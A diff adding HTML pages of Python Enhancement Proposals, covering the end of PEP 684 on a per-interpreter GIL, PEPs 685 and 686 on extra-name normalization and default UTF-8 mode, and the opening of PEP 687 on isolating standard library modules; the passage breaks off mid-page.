If we did stop sharing the allocators between interpreters, we’d have +to do so only for the “mem” and “object” allocators. We might also need +to keep a full set of global allocators for certain runtime-level usage. +There would be some performance penalty due to looking up the current +interpreter and then pointer indirection to get the allocators. +Embedders would also likely have to provide a new allocator context +for each interpreter. On the plus side, allocator hooks (e.g. tracemalloc) +would not be affected.

+

Ultimately, we will go with the simplest option:

+
    +
  • keep the allocators in the global runtime state
  • +
  • require that they be thread-safe
  • +
  • move the state of the default object allocator (AKA “small block” +allocator) to PyInterpreterState
  • +
+

We experimented with a rough implementation and found it was fairly +straightforward, and the performance penalty was essentially zero.

+
+
+
+

C-API

+

Internally, the interpreter state will now track how the import system +should handle extension modules which do not support use with multiple +interpreters. See Restricting Extension Modules below. We’ll refer +to that setting here as “PyInterpreterState.strict_extension_compat”.

+

The following API will be made public, if they haven’t been already:

+
    +
  • PyInterpreterConfig (struct)
  • +
  • PyInterpreterConfig_INIT (macro)
  • +
  • PyInterpreterConfig_LEGACY_INIT (macro)
  • +
  • PyThreadState * Py_NewInterpreterFromConfig(PyInterpreterConfig *)
  • +
+

We will add two new fields to PyInterpreterConfig:

+
    +
  • int own_gil
  • +
  • int strict_extensions_compat
  • +
+

We may add other fields over time, as needed (e.g. “own_initial_thread”).

+

Regarding the initializer macros, PyInterpreterConfig_INIT would +be used to get an isolated interpreter that also avoids +subinterpreter-unfriendly features. It would be the default for +interpreters created through PEP 554. The unrestricted (status quo) +will continue to be available through PyInterpreterConfig_LEGACY_INIT, +which is already used for the main interpreter and Py_NewInterpreter(). +This will not change.

+

A note about the “main” interpreter:

+

Below, we mention the “main” interpreter several times. This refers +to the interpreter created during runtime initialization, for which +the initial PyThreadState corresponds to the process’s main thread. +It is has a number of unique responsibilities (e.g. handling signals), +as well as a special role during runtime initialization/finalization. +It is also usually (for now) the only interpreter. +(Also see https://docs.python.org/3/c-api/init.html#sub-interpreter-support.)

+
+

PyInterpreterConfig.own_gil

+

If true (1) then the new interpreter will have its own “global” +interpreter lock. This means the new interpreter can run without +getting interrupted by other interpreters. This effectively unblocks +full use of multiple cores. That is the fundamental goal of this PEP.

+

If false (0) then the new interpreter will use the main +interpreter’s lock. This is the legacy (pre-3.12) behavior in CPython, +where all interpreters share a single GIL. Sharing the GIL like this +may be desirable when using extension modules that still depend +on the GIL for thread safety.

+

In PyInterpreterConfig_INIT, this will be true. +In PyInterpreterConfig_LEGACY_INIT, this will be false.

+

Also, to play it safe, for now we will not allow own_gil to be true +if a custom allocator was set during runtime init. Wrapping the allocator, +a la tracemalloc, will still be fine.

+
+
+

PyInterpreterConfig.strict_extensions_compat

+

PyInterpreterConfig.strict_extension_compat is basically the initial +value used for “PyInterpreterState.strict_extension_compat”.

+
+
+
+

Restricting Extension Modules

+

Extension modules have many of the same problems as the runtime when +state is stored in global variables. PEP 630 covers all the details +of what extensions must do to support isolation, and thus safely run in +multiple interpreters at once. This includes dealing with their globals.

+

If an extension implements multi-phase init (see PEP 489) it is +considered compatible with multiple interpreters. All other extensions +are considered incompatible. (See Extension Module Thread Safety +for more details about how a per-interpreter GIL may affect that +classification.)

+

If an incompatible extension is imported and the current +“PyInterpreterState.strict_extension_compat” value is true then the import +system will raise ImportError. (For false it simply doesn’t check.) +This will be done through +importlib._bootstrap_external.ExtensionFileLoader (really, through +_imp.create_dynamic(), _PyImport_LoadDynamicModuleWithSpec(), and +PyModule_FromDefAndSpec2()).

+

Such imports will never fail in the main interpreter (or in interpreters +created through Py_NewInterpreter()) since +“PyInterpreterState.strict_extension_compat” initializes to false in both +cases. Thus the legacy (pre-3.12) behavior is preserved.

+

We will work with popular extensions to help them support use in +multiple interpreters. This may involve adding to CPython’s public C-API, +which we will address on a case-by-case basis.

+
+

Extension Module Compatibility

+

As noted in Extension Modules, many extensions work fine in multiple +interpreters (and under a per-interpreter GIL) without needing any +changes. The import system will still fail if such a module doesn’t +explicitly indicate support. At first, not many extension modules +will, so this is a potential source of frustration.

+

We will address this by adding a context manager to temporarily disable +the check on multiple interpreter support: +importlib.util.allow_all_extensions(). More or less, it will modify +the current “PyInterpreterState.strict_extension_compat” value (e.g. through +a private sys function).

+
+
+

Extension Module Thread Safety

+

If a module supports use with multiple interpreters, that mostly implies +it will work even if those interpreters do not share the GIL. The one +caveat is where a module links against a library with internal global +state that isn’t thread-safe. (Even something as innocuous as a static +local variable as a temporary buffer can be a problem.) With a shared +GIL, that state is protected. Without one, such modules must wrap any +use of that state (e.g. through calls) with a lock.

+

Currently, it isn’t clear whether or not supports-multiple-interpreters +is sufficiently equivalent to supports-per-interpreter-gil, such that +we can avoid any special accommodations. This is still a point of +meaningful discussion and investigation. The practical distinction +between the two (in the Python community, e.g. PyPI) is not yet +understood well enough to settle the matter. Likewise, it isn’t clear +what we might be able to do to help extension maintainers mitigate +the problem (assuming it is one).

+

In the meantime, we must proceed as though the difference would be +large enough to cause problems for enough extension modules out there. +The solution we would apply is:

+
    +
  • add a PyModuleDef slot that indicates an extension can be imported +under a per-interpreter GIL (i.e. opt in)
  • +
  • add that slot as part of the definition of a “compatible” extension, +as discussed earlier
  • +
+

The downside is that not a single extension module will be able to take +advantage of the per-interpreter GIL without extra effort by the module +maintainer, regardless of how minor that effort. This compounds the +problem described in Extension Module Compatibility and the same +workaround applies. Ideally, we would determine that there isn’t enough +difference to matter.

+

If we do end up requiring an opt-in for imports under a per-interpreter +GIL, and later determine it isn’t necessary, then we can switch the +default at that point, make the old opt-in slot a noop, and add a new +PyModuleDef slot for explicitly opting out. In fact, it makes +sense to add that opt-out slot from the beginning.

+
+
+
+

Documentation

+
    +
  • C-API: the “Sub-interpreter support” section of Doc/c-api/init.rst +will detail the updated API
  • +
  • C-API: that section will explain about the consequences of +a per-interpreter GIL
  • +
  • importlib: the ExtensionFileLoader entry will note import +may fail in subinterpreters
  • +
  • importlib: there will be a new entry about +importlib.util.allow_all_extensions()
  • +
+
+
+
+

Impact

+
+

Backwards Compatibility

+

No behavior or APIs are intended to change due to this proposal, +with two exceptions:

+
    +
  • some extensions will fail to import in some subinterpreters +(see the next section)
  • +
  • “mem” and “object” allocators that are currently not thread-safe +may now be susceptible to data races when used in combination +with multiple interpreters
  • +
+

The existing C-API for managing interpreters will preserve its current +behavior, with new behavior exposed through new API. No other API +or runtime behavior is meant to change, including compatibility with +the stable ABI.

+

See Objects Exposed in the C-API below for related discussion.

+
+

Extension Modules

+

Currently the most common usage of Python, by far, is with the main +interpreter running by itself. This proposal has zero impact on +extension modules in that scenario. Likewise, for better or worse, +there is no change in behavior under multiple interpreters created +using the existing Py_NewInterpreter().

+

Keep in mind that some extensions already break when used in multiple +interpreters, due to keeping module state in global variables (or +due to the internal state of linked libraries). They +may crash or, worse, experience inconsistent behavior. That was part +of the motivation for PEP 630 and friends, so this is not a new +situation nor a consequence of this proposal.

+

In contrast, when the proposed API is used to +create multiple interpreters, with the appropriate settings, +the behavior will change for incompatible extensions. In that case, +importing such an extension will fail (outside the main interpreter), +as explained in Restricting Extension Modules. For extensions that +already break in multiple interpreters, this will be an improvement.

+

Additionally, some extension modules link against libraries with +thread-unsafe internal global state. +(See Extension Module Thread Safety.) +Such modules will have to start wrapping any direct or indirect use +of that state in a lock. This is the key difference from other modules +that also implement multi-phase init and thus indicate support for +multiple interpreters (i.e. isolation).

+

Now we get to the break in compatibility mentioned above. Some +extensions are safe under multiple interpreters (and a per-interpreter +GIL), even though they haven’t indicated that. Unfortunately, there is +no reliable way for the import system to infer that such an extension +is safe, so importing them will still fail. This case is addressed +in Extension Module Compatibility above.

+
+
+
+

Extension Module Maintainers

+

One related consideration is that a per-interpreter GIL will likely +drive increased use of multiple interpreters, particularly if PEP 554 +is accepted. Some maintainers of large extension modules have expressed +concern about the increased burden they anticipate due to increased +use of multiple interpreters.

+

Specifically, enabling support for multiple interpreters will require +substantial work for some extension modules (albeit likely not many). +To add that support, the maintainer(s) of such a module (often +volunteers) would have to set aside their normal priorities and +interests to focus on compatibility (see PEP 630).

+

Of course, extension maintainers are free to not add support for use +in multiple interpreters. However, users will increasingly demand +such support, especially if the feature grows in popularity.

+

Either way, the situation can be stressful for maintainers of such +extensions, particularly when they are doing the work in their spare +time. The concerns they have expressed are understandable, and we address +the partial solution in the Restricting Extension Modules and +Extension Module Compatibility sections.

+
+
+

Alternate Python Implementations

+

Other Python implementation are not required to provide support for +multiple interpreters in the same process (though some do already).

+
+
+

Security Implications

+

There is no known impact to security with this proposal.

+
+
+

Maintainability

+

On the one hand, this proposal has already motivated a number of +improvements that make CPython more maintainable. That is expected +to continue. On the other hand, the underlying work has already +exposed various pre-existing defects in the runtime that have had +to be fixed. That is also expected to continue as multiple interpreters +receive more use. Otherwise, there shouldn’t be a significant impact +on maintainability, so the net effect should be positive.

+
+
+

Performance

+

The work to consolidate globals has already provided a number of +improvements to CPython’s performance, both speeding it up and using +less memory, and this should continue. The performance benefits of a +per-interpreter GIL specifically have not been explored. At the very +least, it is not expected to make CPython slower +(as long as interpreters are sufficiently isolated). And, obviously, +it enable a variety of multi-core parallelism in Python code.

+
+
+
+

How to Teach This

+

Unlike PEP 554, this is an advanced feature meant for a narrow set +of users of the C-API. There is no expectation that the specifics of +the API nor its direct application will be taught.

+

That said, if it were taught then it would boil down to the following:

+
+
In addition to Py_NewInterpreter(), you can use +Py_NewInterpreterFromConfig() to create an interpreter. +The config you pass it indicates how you want that +interpreter to behave.
+

Furthermore, the maintainers of any extension modules that create +isolated interpreters will likely need to explain the consequences +of a per-interpreter GIL to their users. The first thing to explain +is what PEP 554 teaches about the concurrency model that isolated +interpreters enables. That leads into the point that Python software +written using that concurrency model can then take advantage +of multi-core parallelism, which is currently +prevented by the GIL.

+
+
+

Reference Implementation

+

<TBD>

+
+
+

Open Issues

+
    +
  • Are we okay to require “mem” and “object” allocators to be thread-safe?
  • +
  • How would a per-interpreter tracemalloc module relate to global allocators?
  • +
  • Would the faulthandler module be limited to the main interpreter +(like the signal module) or would we leak that global state between +interpreters (protected by a granular lock)?
  • +
  • Split out an informational PEP with all the relevant info, +based on the “Consolidating Runtime Global State” section?
  • +
  • How likely is it that a module works under multiple interpreters +(isolation) but doesn’t work under a per-interpreter GIL? +(See Extension Module Thread Safety.)
  • +
  • If it is likely enough, what can we do to help extension maintainers +mitigate the problem and enjoy use under a per-interpreter GIL?
  • +
  • What would be a better (scarier-sounding) name +for allow_all_extensions?
  • +
+
+
+

Deferred Functionality

+
    +
  • PyInterpreterConfig option to always run the interpreter in a new thread
  • +
  • PyInterpreterConfig option to assign a “main” thread to the interpreter +and only run in that thread
  • +
+
+
+

Rejected Ideas

+

<TBD>

+
+
+

Extra Context

+
+

Sharing Global Objects

+

We are sharing some global objects between interpreters. +This is an implementation detail and relates more to +globals consolidation +than to this proposal, but it is a significant enough detail +to explain here.

+

The alternative is to share no objects between interpreters, ever. +To accomplish that, we’d have to sort out the fate of all our static +types, as well as deal with compatibility issues for the many objects +exposed in the public C-API.

+

That approach introduces a meaningful amount of extra complexity +and higher risk, though prototyping has demonstrated valid solutions. +Also, it would likely result in a performance penalty.

+

Immortal objects allow us to +share the otherwise immutable global objects. That way we avoid +the extra costs.

+
+

Objects Exposed in the C-API

+

The C-API (including the limited API) exposes all the builtin types, +including the builtin exceptions, as well as the builtin singletons. +The exceptions are exposed as PyObject * but the rest are exposed +as the static values rather than pointers. This was one of the few +non-trivial problems we had to solve for per-interpreter GIL.

+

With immortal objects this is a non-issue.

+
+
+
+

Consolidating Runtime Global State

+

As noted in CPython Runtime State above, there is an active effort +(separate from this PEP) to consolidate CPython’s global state into the +_PyRuntimeState struct. Nearly all the work involves moving that +state from global variables. The project is particularly relevant to +this proposal, so below is some extra detail.

+
+

Benefits to Consolidation

+

Consolidating the globals has a variety of benefits:

+
    +
  • greatly reduces the number of C globals (best practice for C code)
  • +
  • the move draws attention to runtime state that is unstable or broken
  • +
  • encourages more consistency in how runtime state is used
  • +
  • makes it easier to discover/identify CPython’s runtime state
  • +
  • makes it easier to statically allocate runtime state in a consistent way
  • +
  • better memory locality for runtime state
  • +
+

Furthermore all the benefits listed in Indirect Benefits above also +apply here, and the same projects listed there benefit.

+
+
+

Scale of Work

+

The number of global variables to be moved is large enough to matter, +but most are Python objects that can be dealt with in large groups +(like Py_IDENTIFIER). In nearly all cases, moving these globals +to the interpreter is highly mechanical. That doesn’t require +cleverness but instead requires someone to put in the time.

+
+
+

State To Be Moved

+

The remaining global variables can be categorized as follows:

+
    +
  • global objects
      +
    • static types (incl. exception types)
    • +
    • non-static types (incl. heap types, structseq types)
    • +
    • singletons (static)
    • +
    • singletons (initialized once)
    • +
    • cached objects
    • +
    +
  • +
  • non-objects
      +
    • will not (or unlikely to) change after init
    • +
    • only used in the main thread
    • +
    • initialized lazily
    • +
    • pre-allocated buffers
    • +
    • state
    • +
    +
  • +
+

Those globals are spread between the core runtime, the builtin modules, +and the stdlib extension modules.

+

For a breakdown of the remaining globals, run:

+
./python Tools/c-analyzer/table-file.py Tools/c-analyzer/cpython/globals-to-fix.tsv
+
+
+
+
+

Already Completed Work

+

As mentioned, this work has been going on for many years. Here are some +of the things that have already been done:

+
    +
  • cleanup of runtime initialization (see PEP 432 / PEP 587)
  • +
  • extension module isolation machinery (see PEP 384 / PEP 3121 / PEP 489)
  • +
  • isolation for many builtin modules
  • +
  • isolation for many stdlib extension modules
  • +
  • addition of _PyRuntimeState
  • +
  • no more _Py_IDENTIFIER()
  • +
  • statically allocated:
      +
    • empty string
    • +
    • string literals
    • +
    • identifiers
    • +
    • latin-1 strings
    • +
    • length-1 bytes
    • +
    • empty tuple
    • +
    +
  • +
+
+
+

Tooling

+

As already indicated, there are several tools to help identify the +globals and reason about them.

+
    +
  • Tools/c-analyzer/cpython/globals-to-fix.tsv - the list of remaining globals
  • +
  • Tools/c-analyzer/c-analyzer.py
      +
    • analyze - identify all the globals
    • +
    • check - fail if there are any unsupported globals that aren’t ignored
    • +
    +
  • +
  • Tools/c-analyzer/table-file.py - summarize the known globals
  • +
+

Also, the check for unsupported globals is incorporated into CI so that +no new globals are accidentally added.

+
+
+

Global Objects

+

Global objects that are safe to be shared (without a GIL) between +interpreters can stay on _PyRuntimeState. Not only must the object +be effectively immutable (e.g. singletons, strings), but not even the +refcount can change for it to be safe. Immortality (PEP 683) +provides that. (The alternative is that no objects are shared, which +adds significant complexity to the solution, particularly for the +objects exposed in the public C-API.)

+

Builtin static types are a special case of global objects that will be +shared. They are effectively immutable except for one part: +__subclasses__ (AKA tp_subclasses). We expect that nothing +else on a builtin type will change, even the content +of __dict__ (AKA tp_dict).

+

__subclasses__ for the builtin types will be dealt with by making +it a getter that does a lookup on the current PyInterpreterState +for that type.

+
+
+
+
+

References

+

Related:

+
    +
  • PEP 384 “Defining a Stable ABI”
  • +
  • PEP 432 “Restructuring the CPython startup sequence”
  • +
  • PEP 489 “Multi-phase extension module initialization”
  • +
  • PEP 554 “Multiple Interpreters in the Stdlib”
  • +
  • PEP 573 “Module State Access from C Extension Methods”
  • +
  • PEP 587 “Python Initialization Configuration”
  • +
  • PEP 630 “Isolating Extension Modules”
  • +
  • PEP 683 “Immortal Objects, Using a Fixed Refcount”
  • +
  • PEP 3121 “Extension Module Initialization and Finalization”
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0684.rst

+

Last modified: 2024-06-04 17:05:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0685/index.html b/pep-0685/index.html new file mode 100644 index 00000000000..3497fe8cab0 --- /dev/null +++ b/pep-0685/index.html @@ -0,0 +1,330 @@ + + + + + + + + PEP 685 – Comparison of extra names for optional distribution dependencies | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 685 – Comparison of extra names for optional distribution dependencies

+
+
Author:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Mar-2022
+
Post-History:
+
08-Mar-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical specifications are maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies how to normalize distribution extra +names when performing comparisons. +This prevents tools from either failing to find an extra name, or +accidentally matching against an unexpected name.

+
+
+

Motivation

+

The Provides-Extra core metadata specification states that an extra’s +name “must be a valid Python identifier”. +PEP 508 specifies that the value of an extra marker may contain a +letter, digit, or any one of ., -, or _ after the initial character. +There is no other PyPA specification +which outlines how extra names should be written or normalized for comparison. +Due to the amount of packaging-related code in existence, +it is important to evaluate current practices by the community and +standardize on one that doesn’t break most existing code, while being +something tool authors can agree to following.

+

The issue of there being no consistent standard was brought forward by an +initial discussion +noting that the extra adhoc-ssl was not considered equal to the name +adhoc_ssl by pip 22.

+
+
+

Rationale

+

PEP 503 specifies how to normalize distribution names:

+
re.sub(r"[-_.]+", "-", name).lower()
+
+
+

This collapses any run of the characters -, _ and . +down to a single -. +For example, --- . and __ all get converted to just -. +This does not produce a valid Python identifier, per +the core metadata 2.2 specification for extra names.

+

Setuptools 60 performs normalization +via:

+
re.sub(r'[^A-Za-z0-9-.]+', '_', name).lower()
+
+
+

The use of an underscore/_ differs from PEP 503’s use of a hyphen/-, +and it also normalizes characters outside of those allowed by PEP 508. +Runs of . and -, unlike PEP 503, do not get normalized to one _, +e.g. .. stays the same. To note, this is inconsistent with this function’s +docstring, which does specify that all non-alphanumeric characters +(which would include - and .) are normalized and collapsed.

+

For pip 22, its +“extra normalisation behaviour is quite convoluted and erratic” [pip-erratic] +and so its use is not considered.

+
+
+
[pip-erratic]
+
Tzu-ping Chung on Python Discourse <https://discuss.python.org/t/7614/10
+
+
+
+

Specification

+

When comparing extra names, tools MUST normalize the names being compared +using the semantics outlined in PEP 503 +for names:

+
re.sub(r"[-_.]+", "-", name).lower()
+
+
+

The core metadata specification will be updated such that the allowed +names for Provides-Extra matches what PEP 508 specifies for names. +This will bring extra naming in line with that of the Name field. +Because this changes what is considered valid, it will lead to a core +metadata version increase to 2.3.

+

For tools writing core metadata, +they MUST write out extra names in their normalized form. +This applies to the Provides-Extra field and the +extra marker when used in the Requires-Dist field.

+

Tools generating metadata MUST raise an error if a user specified +two or more extra names which would normalize to the same name. +Tools generating metadata MUST raise an error if an invalid extra +name is provided as appropriate for the specified core metadata version. +If a project’s metadata specifies an older core metadata version and +the name would be invalid with newer core metadata versions, +tools reading that metadata SHOULD warn the user. +Tools SHOULD warn users when an invalid extra name is read and SHOULD +ignore the name to avoid ambiguity. +Tools MAY raise an error instead of a warning when reading an +invalid name, if they so desire.

+
+
+

Backwards Compatibility

+

Moving to PEP 503 normalization and PEP 508 name acceptance +allows for all preexisting, valid names to continue to be valid.

+

Based on research looking at a collection of wheels on PyPI [pypi-results], +the risk of extra name clashes is limited to 73 instances when considering +all extras names on PyPI, valid or not (not just those within a single package) +while only looking at valid names leads to only 3 clashes:

+
    +
  • dev-test: dev_test, dev-test, dev.test
  • +
  • dev-lint: dev-lint, dev.lint, dev_lint
  • +
  • apache-beam: apache-beam, apache.beam
  • +
+

By requiring tools writing core metadata to only record the normalized name, +the issue of preexisting, invalid extra names should diminish over time.

+
+
+
[pypi-results]
+
Paul Moore on Python Discourse https://discuss.python.org/t/14141/17
+
+
+
+

Security Implications

+

It is possible that for a distribution that has conflicting extra names, a +tool ends up installing dependencies that somehow weaken the security +of the system. +This is only hypothetical and if it were to occur, +it would probably be more of a security concern for the distributions +specifying such extras names rather than the distribution that pulled +them in together.

+
+
+

How to Teach This

+

This should be transparent to users on a day-to-day basis. +It will be up to tools to educate/stop users when they select extra +names which conflict.

+
+
+

Reference Implementation

+

No reference implementation is provided aside from the code above, +but the expectation is the packaging project will provide a +function in its packaging.utils module that will implement extra name +normalization. +It will also implement extra name comparisons appropriately. +Finally, if the project ever gains the ability to write out metadata, +it will also implement this PEP.

+
+
+

Transition Plan

+

There is a risk that a build tool will produce core metadata +conforming to version 2.3 and thus this PEP but which is consumed by a +tool that is unaware of this PEP (if that tool chooses to attempt to +read a core metadata version it does not directly support). +In such a case there is a chance that a user may specify an extra +using an non-normalized name which worked previously but which fails +now.

+

As such, consumers of this PEP should be prioritized more than +producers so that users can be notified that they are specifying extra +names which are not normalized (and thus may break in the future).

+
+
+

Rejected Ideas

+
+

Using setuptools 60’s normalization

+

Initially, this PEP proposed using setuptools safe_extra() for normalization +to try to minimize backwards-compatibility issues. +However, after checking various wheels on PyPI, +it became clear that standardizing all naming on PEP 508 and +PEP 503 semantics was easier and better long-term, +while causing minimal backwards compatibility issues.

+
+
+
+

Open Issues

+

N/A

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0685.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0686/index.html b/pep-0686/index.html new file mode 100644 index 00000000000..153e7d860d2 --- /dev/null +++ b/pep-0686/index.html @@ -0,0 +1,298 @@ + + + + + + + + PEP 686 – Make UTF-8 mode default | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 686 – Make UTF-8 mode default

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
18-Mar-2022
+
Python-Version:
+
3.15
+
Post-History:
+
18-Mar-2022, +31-Mar-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes enabling UTF-8 mode by default.

+

With this change, Python consistently uses UTF-8 for default encoding of +files, stdio, and pipes.

+
+
+

Motivation

+

UTF-8 becomes de facto standard text encoding.

+
    +
  • The default encoding of Python source files is UTF-8.
  • +
  • JSON, TOML, YAML use UTF-8.
  • +
  • Most text editors, including Visual Studio Code and Windows Notepad use +UTF-8 by default.
  • +
  • Most websites and text data on the internet use UTF-8.
  • +
  • And many other popular programming languages, including Node.js, Go, Rust, +and Java uses UTF-8 by default.
  • +
+

Changing the default encoding to UTF-8 makes it easier for Python to +interoperate with them.

+

Additionally, many Python developers using Unix forget that the default +encoding is platform dependent. +They omit to specify encoding="utf-8" when they read text files encoded +in UTF-8 (e.g. JSON, TOML, Markdown, and Python source files). +Inconsistent default encoding causes many bugs.

+
+
+

Specification

+
+

Enable UTF-8 mode by default

+

Python will enable UTF-8 mode by default from Python 3.15.

+

Users can still disable UTF-8 mode by setting PYTHONUTF8=0 or +-X utf8=0.

+
+
+

locale.getencoding()

+

Since UTF-8 mode affects locale.getpreferredencoding(False), +we need an API to get locale encoding regardless of UTF-8 mode.

+

locale.getencoding() will be added for this purpose. +It returns locale encoding too, but ignores UTF-8 mode.

+

When warn_default_encoding option is specified, +locale.getpreferredencoding() will emit EncodingWarning like +open() (see also PEP 597).

+

This API was added in Python 3.11.

+
+
+

Fixing encoding="locale" option

+

PEP 597 added the encoding="locale" option to the TextIOWrapper. +This option is used to specify the locale encoding explicitly. +TextIOWrapper should use locale encoding when the option is specified, +regardless of default text encoding.

+

But TextIOWrapper uses "UTF-8" in UTF-8 mode even if +encoding="locale" is specified for now. +This behavior is inconsistent with the PEP 597 motivation. +It is because we didn’t expect making UTF-8 mode default when Python +changes its default text encoding.

+

This inconsistency should be fixed before making UTF-8 mode default. +TextIOWrapper should use locale encoding when encoding="locale" is +passed even in UTF-8 mode.

+

This issue was fixed in Python 3.11.

+
+
+
+

Backward Compatibility

+

Most Unix systems use UTF-8 locale and Python enables UTF-8 mode when its +locale is C or POSIX. +So this change mostly affects Windows users.

+

When a Python program depends on the default encoding, this change may cause +UnicodeError, mojibake, or even silent data corruption. +So this change should be announced loudly.

+

This is the guideline to fix this backward compatibility issue:

+
    +
  1. Disable UTF-8 mode.
  2. +
  3. Use EncodingWarning (PEP 597) to find every places UTF-8 mode +affects.
      +
    • If encoding option is omitted, consider using encoding="utf-8" +or encoding="locale".
    • +
    • If locale.getpreferredencoding() is used, consider using +"utf-8" or locale.getencoding().
    • +
    +
  4. +
  5. Test the application with UTF-8 mode.
  6. +
+
+
+

Preceding examples

+
    +
  • Ruby changed the default external_encoding +to UTF-8 on Windows in Ruby 3.0 (2020).
  • +
  • Java changed the default text encoding +to UTF-8 in JDK 18. (2022).
  • +
+

Both Ruby and Java have an option for backward compatibility. +They don’t provide any warning like PEP 597’s EncodingWarning +in Python for use of the default encoding.

+
+
+

Rejected Alternative

+
+

Deprecate implicit encoding

+

Deprecating the use of the default encoding is considered.

+

But there are many cases that the default encoding is used for reading/writing +only ASCII text. +Additionally, such warnings are not useful for non-cross platform applications +run on Unix.

+

So forcing users to specify the encoding everywhere is too painful. +Emitting a lot of DeprecationWarning will lead users ignore warnings.

+

PEP 387 requires adding a warning for backward incompatible changes. +But it doesn’t require using DeprecationWarning. +So using optional EncodingWarning doesn’t violate the PEP 387.

+

Java also rejected this idea in JEP 400.

+
+
+

Use PYTHONIOENCODING for PIPEs

+

To ease backward compatibility issue, using PYTHONIOENCODING as the +default encoding of PIPEs in the subprocess module is considered.

+

With this idea, users can use legacy encoding for +subprocess.Popen(text=True) even in UTF-8 mode.

+

But this idea makes “default encoding” complicated. +And this idea is also backward incompatible.

+

So this idea is rejected. Users can disable UTF-8 mode until they replace +text=True with encoding="utf-8" or encoding="locale".

+
+
+
+

How to teach this

+

For new users, this change reduces things that need to teach. +Users don’t need to learn about text encoding in their first year. +They should learn it when they need to use non-UTF-8 text files.

+

For existing users, see the Backward compatibility section.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0686.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0687/index.html b/pep-0687/index.html new file mode 100644 index 00000000000..12539459f77 --- /dev/null +++ b/pep-0687/index.html @@ -0,0 +1,314 @@ + + + + + + + + PEP 687 – Isolating modules in the standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 687 – Isolating modules in the standard library

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Requires:
+
489, 573, 630
+
Created:
+
04-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
04-Apr-2022, +11-Apr-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Extensions in the standard library will be converted to multi-phase +initialization (PEP 489) and where possible, all state will be +stored on module objects rather than in process-global variables.

+
+
+

Note on Backdating

+

Much of this proposal has already been implemented. +We submit this PEP to explain the changes, seek consensus on +whether they are good, propose the remaining changes, +and set best practices for new modules.

+
+
+

Motivation & Rationale

+

The informational PEP 630 describes the background, motivation, rationale, +implications and implementation notes of the proposed changes as they apply +generally to any extension module (not just the standard library).

+

It is an integral part of this proposal. Read it first.

+

This PEP discusses specifics of the standard library.

+
+
+

Specification

+

The body of PEP 630 will be converted to a HOWTO in the Python +documentation, and that PEP will be retired (marked Final).

+

All extension modules in the standard library will be converted to multi-phase +initialization introduced in PEP 489.

+

All stdlib extension modules will be isolated. That is:

+
    +
  • Types, functions and other objects defined by the module will either be +immutable, or not shared with other module instances.
  • +
  • State specific to the module will not be shared with other module instances, +unless it represents global state.

    For example, _csv.field_size_limit will get/set a module-specific +number. On the other hand, functions like readline.get_history_item or +os.getpid will continue to work with state that is process-global +(external to the module, and possibly shared across other libraries, including +non-Python ones).

    +
  • +
+
+

Conversion to heap types

+

Static types that do not need module state access, and have no other reason to +be converted, should stay static.

+

Types whose methods need access to their module instance will be converted +to heap types following PEP 630, with the following considerations:

+
    +
  • All standard library types that used to be static types should remain +immutable. Heap types must be defined with the Py_TPFLAGS_IMMUTABLE_TYPE +flag to retain immutability. +See bpo-43908.

    Tests should ensure TypeError is raised when trying to create a new +attribute of an immutable type.

    +
  • +
  • A static type with tp_new = NULL does not have a public constructor, but +heap types inherit the constructor from the base class. Make sure types that +previously were impossible to instantiate retain that feature; use +Py_TPFLAGS_DISALLOW_INSTANTIATION. Add tests using +test.support.check_disallow_instantiation(). See +bpo-43916.
  • +
  • Converted heap types may unintentionally become serializable +(pickle-able). Test that calling pickle.dumps has the same result +before and after conversion, and if the test fails, add a __reduce__ +method that raises TypeError. See PR-21002 +for an example.
  • +
+

These issues will be added to the Devguide to help any future conversions.

+

If another kind of issue is found, the module in question should be unchanged +until a solution is found and added to the Devguide, and already +converted modules are checked and fixed.

+
+
+

Process

+

The following process should be added to the Devguide, and remain until +all modules are converted. +Any new findings should be documented there or in the general HOWTO.

+
+

Part 1: Preparation

+
    +
  1. Open a discussion, either on the bug tracker or on Discourse. Involve the +module maintainer and/or code owner. Explain the reason and rationale for +the changes.
  2. +
  3. Identify global state performance bottlenecks. +Create a proof-of-concept implementation, and measure the performance impact. +pyperf is a good tool for benchmarking.
  4. +
  5. Create an implementation plan. For small modules with few types, a single PR +may do the job. For larger modules with lots of types, and possibly also +external library callbacks, multiple PR’s will be needed.
  6. +
+
+
+

Part 2: Implementation

+

